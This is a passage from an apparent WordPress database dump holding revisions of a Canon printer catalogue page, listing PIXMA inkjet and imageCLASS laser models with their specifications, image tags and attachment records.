]</p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p><br />ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p><br />Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p><br />Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity</li></ul>		\n			<h4>imageCLASS MF269dw</h4>		\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul>		\n			<h4>imageCLASS MF266dn</h4>		\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul>		\n			<h4>imageCLASS MF913w</h4>		\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul>		\n			<h4>imageCLASS LBP113w</h4>		\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity</li></ul>		\n			<h4>imageCLASS MF269dw</h4>		\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul>		\n			<h4>imageCLASS MF266dn</h4>		\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul>		\n			<h4>imageCLASS MF913w</h4>		\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-24 09:33:03','2018-12-24 01:33:03','',1449,'https://bintara.com.my/blog/2018/12/24/1449-revision-v1/',0,'revision','',0),(2724,1,'2018-12-24 09:38:54','2018-12-24 01:38:54','','74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1','','inherit','closed','closed','','74f5403ab44740bc9c8fd1c01ab53d26_lbp113w-1','','','2018-12-24 09:38:54','2018-12-24 01:38:54','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png',0,'attachment','image/png',0),(2725,1,'2018-12-24 09:39:25','2018-12-24 01:39:25','','14e8362b0db44a5daaf2af034760fc58_MF269dw-1','','inherit','closed','closed','','14e8362b0db44a5daaf2af034760fc58_mf269dw-1','','','2018-12-24 09:39:25','2018-12-24 01:39:25','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png',0,'attachment','image/png',0),(2726,1,'2018-12-24 09:40:18','2018-12-24 01:40:18','','f8389aa599cc42db986e698ac364f9fc_MF266dn-1','','inherit','closed','closed','','f8389aa599cc42db986e698ac364f9fc_mf266dn-1','','','2018-12-24 09:40:18','2018-12-24 01:40:18','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png',0,'attachment','image/png',0),(2727,1,'2018-12-24 09:41:11','2018-12-24 01:41:11','','7583474b04984f42b18e94fe91075ec9_MF913w-1','','inherit','closed','closed','','7583474b04984f42b18e94fe91075ec9_mf913w-1','','','2018-12-24 09:41:11','2018-12-24 01:41:11','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png',0,'attachment','image/png',0),(2728,1,'2018-12-24 09:42:15','2018-12-24 01:42:15','','e2fa8e1c70b54636a6922a5d483f3250_MF113w-2','','inherit','closed','closed','','e2fa8e1c70b54636a6922a5d483f3250_mf113w-2','','','2018-12-24 09:42:15','2018-12-24 01:42:15','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png',0,'attachment','image/png',0),(2733,1,'2018-12-24 09:47:38','2018-12-24 01:47:38','<h3>Injet Printers :-</h3>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p><br />ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p><br />Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p><br />Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity</li></ul>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-24 09:47:38','2018-12-24 01:47:38','',1449,'https://bintara.com.my/blog/2018/12/24/1449-revision-v1/',0,'revision','',0),(2730,1,'2018-12-24 09:45:17','2018-12-24 01:45:17','','bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1','','inherit','closed','closed','','bebe20358b144d6a9208a36dabdf2a3e_lbp913w-1','','','2018-12-24 09:45:17','2018-12-24 01:45:17','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png',0,'attachment','image/png',0),(2731,1,'2018-12-24 09:46:07','2018-12-24 01:46:07','','3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01','','inherit','closed','closed','','3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01','','','2018-12-24 09:46:07','2018-12-24 01:46:07','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png',0,'attachment','image/png',0),(2732,1,'2018-12-24 09:47:02','2018-12-24 01:47:02','','3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1','','inherit','closed','closed','','3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1','','','2018-12-24 09:47:02','2018-12-24 01:47:02','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png',0,'attachment','image/png',0),(2735,1,'2018-12-24 09:58:10','2018-12-24 01:58:10','<h3>Injet Printers :-</h3>		\n			<h4>PIXMA E560 / 